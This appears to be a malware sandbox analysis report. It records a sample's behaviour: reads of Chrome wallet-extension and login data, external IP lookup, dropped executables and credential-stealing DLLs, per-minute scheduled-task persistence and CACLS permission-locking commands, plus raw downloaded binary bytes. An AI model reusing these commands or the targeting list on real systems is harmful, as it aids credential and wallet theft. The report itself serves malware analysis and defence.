file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\lockfile
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\djclckkglechooblngghdinmeemkbgci
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\dppgmdbiimibapkepcbdbmkaabgiofem
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnmbobjmhlngoefaiojfljckilhhlhcj
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\igkpcodhieompeloncfnbekccinhapdb
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\UC Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\nhhldecdfagpbfggphklkaeiocfnaafm
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\ocglkepbibnalbgmbachknglpdipeoio
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acdamagkdfmpkclpoglgnbddngblgibo
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\ldinpeekobnhjjdofggfgjlcehhmanlj

Looks up the external IP address (1 event)

domain

api.ipify.org

Creates executable files on the filesystem (39 events)

file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\5Az4sH9.exe
file	C:\Users\test22\AppData\Local\Temp\1000006001\1.exe
file	C:\Users\test22\AppData\Local\Temp\1000009001\trafico.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\kG1Do08.exe
file	C:\Users\test22\AppData\Local\Temp\EDD5.tmp\EDF6.tmp\EDF7.bat
file	C:\Users\test22\AppData\Roaming\aca439ae61e801\cred64.dll
file	C:\Users\test22\AppData\Local\Temp\1000081001\amers.exe
file	C:\Users\test22\AppData\Local\Temp\IXP003.TMP\dw4YC64.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\tooltip[1].js
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7wT5Ey89.exe
file	C:\Users\test22\AppData\Local\Temp\1000008001\abd.exe
file	C:\Users\test22\AppData\Local\Temp\IXP004.TMP\yR0Hb97.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\ZC1Hg57.exe
file	C:\Users\test22\AppData\Local\Temp\1000080001\haloup.exe
file	C:\Users\test22\AppData\Local\Temp\1000029001\lom30.exe
file	C:\Users\test22\AppData\Local\Temp\1000020001\TEST32.exe
file	C:\Users\test22\AppData\Local\Temp\IXP003.TMP\4ec216QK.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\login[1].js
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\3.520a7eda.chunk[1].js
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\manifest[1].js
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\shared_global[1].js
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\6Ye1nZ1.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\BD4sp82.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\jquery-1.11.1.min[1].js
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\global[1].js
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\main.10a25667.chunk[1].js
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\shared_responsive_adapter[1].js
file	C:\Users\test22\AppData\Local\Temp\1000027001\TEST32.exe
file	C:\Users\test22\AppData\Local\Temp\IXP005.TMP\1TO62yp3.exe
file	C:\Users\test22\AppData\Local\Temp\1000024001\build2.exe
file	C:\Users\test22\AppData\Roaming\465dbc52837d81\cred64.dll
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\main[1].js
file	C:\Users\test22\AppData\Local\Temp\IXP005.TMP\2jX0103.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\_combined[1].js
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\prototype-1.7[1].js
file	C:\Users\test22\AppData\Roaming\aca439ae61e801\clip64.dll
file	C:\Users\test22\AppData\Roaming\465dbc52837d81\clip64.dll
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\libraries~b28b7af69[1].js
file	C:\Users\test22\AppData\Local\Temp\IXP004.TMP\3mI23vW.exe

Creates a suspicious process (11 events)

cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\e8b5234212" /P "test22:N"&&CACLS "..\e8b5234212" /P "test22:R" /E&&Exit
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y\|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit
cmdline	"C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\EDD5.tmp\EDF6.tmp\EDF7.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7wT5Ey89.exe"
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe
file	C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe

Drops an executable to the user AppData folder (9 events)

file	C:\Users\test22\AppData\Local\Temp\1000027001\TEST32.exe
file	C:\Users\test22\AppData\Local\Temp\1000009001\trafico.exe
file	C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
file	C:\Users\test22\AppData\Local\Temp\1000024001\build2.exe
file	C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe
file	C:\Users\test22\AppData\Local\Temp\1000029001\lom30.exe
file	C:\Users\test22\AppData\Roaming\465dbc52837d81\clip64.dll
file	C:\Users\test22\AppData\Roaming\aca439ae61e801\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\1000006001\1.exe

A process created a hidden window (14 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Nov. 3, 2023, 6:09 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe	1	1
ShellExecuteExW Nov. 3, 2023, 6:09 p.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW Nov. 3, 2023, 6:09 p.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\e8b5234212" /P "test22:N"&&CACLS "..\e8b5234212" /P "test22:R" /E&&Exit filepath: cmd	1	1
ShellExecuteExW Nov. 3, 2023, 6:09 p.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\aca439ae61e801\cred64.dll, Main filepath: rundll32.exe	1	1
ShellExecuteExW Nov. 3, 2023, 6:09 p.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\aca439ae61e801\clip64.dll, Main filepath: rundll32.exe	1	1
ShellExecuteExW Nov. 3, 2023, 6:10 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe	1	1
ShellExecuteExW Nov. 3, 2023, 6:10 p.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW Nov. 3, 2023, 6:10 p.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit filepath: cmd	1	1
ShellExecuteExW Nov. 3, 2023, 6:10 p.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\465dbc52837d81\cred64.dll, Main filepath: rundll32.exe	1	1
ShellExecuteExW Nov. 3, 2023, 6:10 p.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\465dbc52837d81\clip64.dll, Main filepath: rundll32.exe	1	1
ShellExecuteExW Nov. 3, 2023, 6:10 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe	1	1
ShellExecuteExW Nov. 3, 2023, 6:10 p.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW Nov. 3, 2023, 6:10 p.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y\|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit filepath: cmd	1	1
ShellExecuteExW Nov. 3, 2023, 6:10 p.m.	show_type: 0 filepath_r: C:\Windows\sysnative\cmd parameters: /c "C:\Users\test22\AppData\Local\Temp\EDD5.tmp\EDF6.tmp\EDF7.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7wT5Ey89.exe" filepath: C:\Windows\sysnative\cmd	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (16 events)

Time & API	Arguments	Status	Return
Process32NextW Nov. 3, 2023, 6:09 p.m.	snapshot_handle: 0x0000000000000130 process_name: mobsync.exe process_identifier: 2280	1	1
Process32NextW Nov. 3, 2023, 6:09 p.m.	snapshot_handle: 0x0000000000000130 process_name: taskhost.exe process_identifier: 2376	1	1
Process32NextW Nov. 3, 2023, 6:09 p.m.	snapshot_handle: 0x0000000000000130 process_name: 1.exe process_identifier: 2200	1	1
Process32NextW Nov. 3, 2023, 6:09 p.m.	snapshot_handle: 0x0000000000000130 process_name: rundll32.exe process_identifier: 2472	1	1
Process32NextW Nov. 3, 2023, 6:09 p.m.	snapshot_handle: 0x0000000000000130 process_name: rundll32.exe process_identifier: 2512	1	1
Process32NextW Nov. 3, 2023, 6:09 p.m.	snapshot_handle: 0x00000000000002b0 process_name: WmiPrvSE.exe process_identifier: 2808	1	1
Process32NextW Nov. 3, 2023, 6:03 p.m.	snapshot_handle: 0x000000000000013c process_name: Utsysc.exe process_identifier: 1080	1	1
Process32NextW Nov. 3, 2023, 6:03 p.m.	snapshot_handle: 0x000000000000013c process_name: trafico.exe process_identifier: 1996	1	1
Process32NextW Nov. 3, 2023, 6:03 p.m.	snapshot_handle: 0x000000000000013c process_name: TEST32.exe process_identifier: 1520	1	1
Process32NextW Nov. 3, 2023, 6:03 p.m.	snapshot_handle: 0x000000000000013c process_name: rundll32.exe process_identifier: 2876	1	1
Process32NextW Nov. 3, 2023, 6:03 p.m.	snapshot_handle: 0x000000000000013c process_name: rundll32.exe process_identifier: 916	1	1
Process32NextW Nov. 3, 2023, 6:03 p.m.	snapshot_handle: 0x000000000000013c process_name: build2.exe process_identifier: 1456	1	1
Process32NextW Nov. 3, 2023, 6:03 p.m.	snapshot_handle: 0x000000000000013c process_name: conhost.exe process_identifier: 1732	1	1
Process32NextW Nov. 3, 2023, 6:03 p.m.	snapshot_handle: 0x000000000000013c process_name: rundll32.exe process_identifier: 2388	1	1
Process32NextW Nov. 3, 2023, 6:03 p.m.	snapshot_handle: 0x00000000000002bc process_name: amers.exe process_identifier: 3016	1	1
Process32NextW Nov. 3, 2023, 6:03 p.m.	snapshot_handle: 0x00000000000002bc process_name: TEST32.exe process_identifier: 1792	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Nov. 3, 2023, 6:11 p.m.	process_identifier: 3544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x03650000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Nov. 3, 2023, 6:10 p.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the process utsysc.exe (13 events)

Time & API	Arguments	Status	Return
InternetReadFile Nov. 3, 2023, 6:09 p.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÐÃ Ç±^Ç±^Ç±^Ùã8^Ñ±^Ùã)^ò±^Ùã.^D±^àwÖ^Å±^¾ð^Ä±^Ç±¬^±^ÎÉ)^Æ±^ÎÉ<^Æ±^RichÇ±^PELueBeà Ê°§ð@Ð¸H0ðP.text£¤ `.reloc$À&¨ `.rdatapPðRÎ@@.dataH®P @À.qbjfzÐ°ÀUììMìÆEÿ¸ÀtÇEøë MøéMø}ø~ëïëí3ÒtÇEô(ë EôèEô}ô~ëïëí¹ÉtÇEðJë UðêUð}ð~ëïëíhÈñAMè<Eå]ÂÌÌÌUììðþÿÿhÌñA\|ÿÿÿèhÐñAM¤èÝÐýAÝ]øhôñAMÀèîÝÈýAÝ]hòAMÜèØhdòAPÿÿÿèÈPhtòA4ÿÿÿè·PèA'Äoÿÿÿ4ÿÿÿèÝPÿÿÿèÒ¶oÿÿÿÀt(Çxÿÿÿ=ëxÿÿÿéxÿÿÿ½xÿÿÿ~ëæëäºÒt(Çtÿÿÿ)ëtÿÿÿètÿÿÿ½tÿÿÿ~ëæëähòAÿÿÿèPhòAøþÿÿè Pè·'Ä3ÿÿÿøþÿÿè3ÿÿÿè(¶3ÿÿÿÉt(Çpÿÿÿëpÿÿÿêpÿÿÿ½pÿÿÿ~ëæëäÆ÷þÿÿMÜèæMÀèÞM¤èÖ\|ÿÿÿèËMèÃM4è»÷þÿÿå]ÂLÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìQMüMèå]Â8ÌÌÌÌÌÌÌÌÌÌÌUìì$MÜÝèýAÝ]øÆEçÝàýAÝ]èÝØýAÝ]ð¸ÀtÇEà7ë MàéMà}à~ëïëíh¤òAMèæEå]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìì°PÿÿÿÝðýAÝ]ÐÇEÇEüCh¸òAMèhØòAMÜèh@óAM´èÇEøhóApÿÿÿèlPh¸óATÿÿÿè[Pè&ÄETÿÿÿèpÿÿÿèy¶EÀtÇEë MéM}~ëïëíhÔóAMèM´è@MÜè8Mè0Mè(M,è Eå]ÂHÌÌÌÌÌÌÌUììÀ@ÿÿÿÝþAÝ]ðÆEÿhàóAMÔè§ÇE2 ÝþAÝ]Èh8ôAM¤èÝøýAÝ]ÀhôAMèthôA`ÿÿÿèdPhàôADÿÿÿèSPèý$ÄÿÿÿDÿÿÿèy`ÿÿÿèn¶ÿÿÿÀtÇEKë MéM}~ëïëíh8õAMèúMè2M¤èMÔè"Eå]ÂÌÌÌÌÌÌÌÌÌUììdMÆE÷ÇE¸ûÇE´4ÝþAÝ]àÆEïÇEðh@õAM¼èÇEÜÝþAÝ]øÆEÛ¸ÀtÇE°+ë M°éM°}°~ëïëí3ÒtÇE¬:ë E¬èE¬}¬~ëïëí3ÉtÇE¨`ë U¨êU¨}¨~ëïëí3ÀtÇE¤6ë M¤éM¤}¤~ëïëíºÒtÇE ë E èE } ~ëïëíM¼èå]ÂÌÌÌÌÌÌÌÌUìììþÿÿhlõAMÔè¤Ý þAÝ]ðhõAM¸èÆEÿhàõAMè}Ph(öAhÿÿÿèlPè#ÄE£hÿÿÿèMè¶E£ÀtÇE´ë M´éM´}´~ëïëíhlöAHÿÿÿèPhöA,ÿÿÿèPè²"Ägÿÿÿ,ÿÿÿè.Hÿÿÿè#¶gÿÿÿÒtÇE°>ë E°èE°}°~ëïëí¹ÉtÇE¬?ë U¬êU¬}¬~ëïëíh¼öAÿÿÿè PhäöAðþÿÿèv Pè "Ä+ÿÿÿðþÿÿè ÿÿÿè ¶+ÿÿÿÀtÇE¨\ë M¨éM¨}¨~ëïëí3ÒtÇE¤>ë E¤èE¤}¤~ëïëíh÷AMèýM¸è5 MÔè- Mè% Eå]Â(ÌÌÌÌÌÌÌÌÌÌÌÌUììpMÆEãh ÷AMäè¶ÇEÜ¸ÀtÇEØ=ë MØéMØ}Ø~ëïëí3ÒtÇEÔDë EÔèEÔ}Ô~ëïëíh<÷AM°è]PhX÷AMèOPèÙÄEÏMè{M°ès¶MÏÉtÇEÐë UÐêUÐ}Ð~ëïëíht÷AMèMäè:Eå]ÂÌUììTM¬Ý8þAÝ]èÆEúÝ0þAÝ]ðÆEûÇEÄÝ(þAÝ]¸ÇEüÜh÷AMÌè©ÆEË3ÀtÇE´Uë M´éM´}´~ëïëí3ÒtÇE°'ë E°èE°}°~ëïëíMÌèMèå]Â$ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì`M ÝXþAÝ]àÝPþAÝ]èh´÷AMÄèÝHþAÝ]øÆE³ÆEöÇE´ÄÝ@þAÝ]¸ÆE÷¸ÀtÇE¬ë M¬éM¬}¬~ëïëí3ÒtÇE¨=ë E¨èE¨}¨~ëïëíÆE§MÄèâ M(èÚ E§å]ÂDÌUììÔ,ÿÿÿhÄ÷AMÜèt ÆEÛÇEøÒÇEüÌhÔ÷AM¼èU høAMèH PhTøAxÿÿÿè7 PèáÄE³xÿÿÿè` MèX ¶E³ÀtÇE¸>ë M¸éM¸}¸~ëïëíhøAXÿÿÿèä Ph¤øA<ÿÿÿèÓ Pè]Äwÿÿÿ<ÿÿÿèù Xÿÿÿèî ¶wÿÿÿÒtÇE´ë E´èE´}´~ëïëíÝ`þAÝ0ÿÿÿM¼è³ MÜè« Ý0ÿÿÿå]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUììD¼þÿÿh¸øAMÀè4 ÝxþAÝ]øÝpþAÝxÿÿÿhùAMÜè h(ùAM è ÆE¿hùAPÿÿÿèñÆoÿÿÿÝhþAÝpÿÿÿhèùAMèÑhHúAÿÿÿèÁP request_handle: 0x00cc000c	1	1
InternetReadFile Nov. 3, 2023, 6:09 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $¶Õ×uOÕ×uOÕ×uO¿qNÇ×uO¿vNÞ×uO¿pNe×uOºpN×uOºqNÚ×uOºvNÜ×uO¿tNØ×uOÕ×tO×uON¹\|NÑ×uON¹uNÔ×uON¹OÔ×uON¹wNÔ×uORichÕ×uOPEdÁ=eð" lè¿À`%XX%øÐ@ª ð GpHè.textXkl `.rdataÂ¹ºp@@.dataL@B*@À.pdata@ªÐ¬l@@_RDATA@@.rsrcø@@.relocð @BHì(A¸ HgH à[èsßH l4HÄ(éO¬ÌÌÌHì(A¸ H_H pbèCßH ¬4HÄ(é¬ÌÌÌHì(A¸HSH @cèßH ì4HÄ(éï«ÌÌÌHì(A¸ H/H Ð\èãÞH ,5HÄ(é¿«ÌÌÌHì(A¸H'H aè³ÞH l5HÄ(é«ÌÌÌHì(A¸HH 0ZèÞH ¬5HÄ(é_«ÌÌÌHì(E3ÀHH #bèVÞH ï5HÄ(é2«ÌÌÌÌÌÌHì(E3ÀHRH bè&ÞH /6HÄ(é«ÌÌÌÌÌÌHì(E3ÀH"H \èöÝH o6HÄ(éÒªÌÌÌÌÌÌHì(E3ÀHò~H óXèÆÝH ¯6HÄ(é¢ªÌÌÌÌÌÌHì(A¸H?H ÀYèÝH ì6HÄ(éoªÌÌÌHì(A¸HH eècÝH ,7HÄ(é?ªÌÌÌHì(A¸HÿH À`è3ÝH l7HÄ(éªÌÌÌHì(A¸HßH pWèÝH ¬7HÄ(éß©ÌÌÌHì(A¸H¿H `ZèÓÜH ì7HÄ(é¯©ÌÌÌHì(A¸H¯H ]è£ÜH ,8HÄ(é©ÌÌÌHì(A¸HH ]èsÜH l8HÄ(éO©ÌÌÌHì(A¸HkH 0[èCÜH ¬8HÄ(é©ÌÌÌHì(A¸HGH `\èÜH ì8HÄ(éï¨ÌÌÌHì(A¸H/H °^èãÛH ,9HÄ(é¿¨ÌÌÌHì(A¸HH `_è³ÛH l9HÄ(é¨ÌÌÌHì(A¸LHïH ZèÛH ¬9HÄ(é_¨ÌÌÌHì(A¸HH `VèSÛH ì9HÄ(é/¨ÌÌÌHì(A¸dHÿH pbè#ÛH ,:HÄ(éÿ§ÌÌÌHì(A¸H7H _èóÚH l:HÄ(éÏ§ÌÌÌHì(A¸HH ð\èÃÚH ¬:HÄ(é§ÌÌÌHì(A¸HH àUèÚH ì:HÄ(éo§ÌÌÌHì(A¸HïH °]ècÚH ,;HÄ(é?§ÌÌÌHì(A¸(HÏH \è3ÚH l;HÄ(é§ÌÌÌHì(A¸HÏH Ð_èÚH ¬;HÄ(éß¦ÌÌÌHì(A¸H¯H bèÓÙH ì;HÄ(é¯¦ÌÌÌHì(A¸HH ]è£ÙH ,<HÄ(é¦ÌÌÌHì(A¸HoH _èsÙH l<HÄ(éO¦ÌÌÌHì(A¸H_H YèCÙH ¬<HÄ(é¦ÌÌÌHì(A¸,H?H @ZèÙH ì<HÄ(éï¥ÌÌÌHì(A¸H?H ÐXèãØH ,=HÄ(é¿¥ÌÌÌHì(A¸H/H ]è³ØH l=HÄ(é¥ÌÌÌHì(A¸$HH Ð^èØH ¬=HÄ(é_¥ÌÌÌHì(A¸HH @ZèSØH ì=HÄ(é/¥ÌÌÌHì(A¸HïH pRè#ØH ,>HÄ(éÿ¤ÌÌÌHì(A¸HßH Zèó×H l>HÄ(éÏ¤ÌÌÌHì(A¸HÏH VèÃ×H ¬>HÄ(é¤ÌÌÌHì(A¸ H¯H [è×H ì>HÄ(éo¤ÌÌÌHì(A¸ H§H 0Xèc×H ,?HÄ(é?¤ÌÌÌHì(A¸H?H àSè3×H l?HÄ(é¤ÌÌÌHì(A¸HoH 0Wè×H ¬?HÄ(éß£ÌÌÌHì(A¸HWH SèÓÖH ì?HÄ(é¯£ÌÌÌHì(A¸H7H P]è£ÖH ,@HÄ(é£ÌÌÌHì(A¸LHßH ÀWèsÖH l@HÄ(éO£ÌÌÌHì(A¸HçH ÐWèCÖH ¬@HÄ(é£ÌÌÌHì(A¸dHïH XèÖH ì@HÄ(éï¢ÌÌÌHì(A¸HH P]èãÕH ,AHÄ(é¿¢ÌÌÌHì(A¸HH À[è³ÕH lAHÄ(é¢ÌÌÌHì(A¸HgH WèÕH ¬AHÄ(é_¢ÌÌÌHì(A¸HGH SèSÕH ìAHÄ(é/¢ÌÌÌHì(A¸HH p]è#ÕH ,BHÄ(éÿ¡ÌÌÌHì(A¸H÷H VèóÔH lBHÄ(éÏ¡ÌÌÌHì(A¸HÏH pTèÃÔH ¬BHÄ(é¡ÌÌÌHì(A¸H¯H ÀQèÔH ìBHÄ(éo¡ÌÌÌHì(A¸HH NècÔH ,CHÄ(é?¡ÌÌÌHì(A¸HH @Wè3ÔH lCHÄ(é¡ÌÌÌHì(A¸0H_H Ð[èÔH ¬CHÄ(éß ÌÌÌHì(A¸HgH À[èÓÓH ìCHÄ(é¯ ÌÌÌHì(A¸HGH p\è£ÓH ,DHÄ(é ÌÌÌ request_handle: 0x00cc000c	1	1
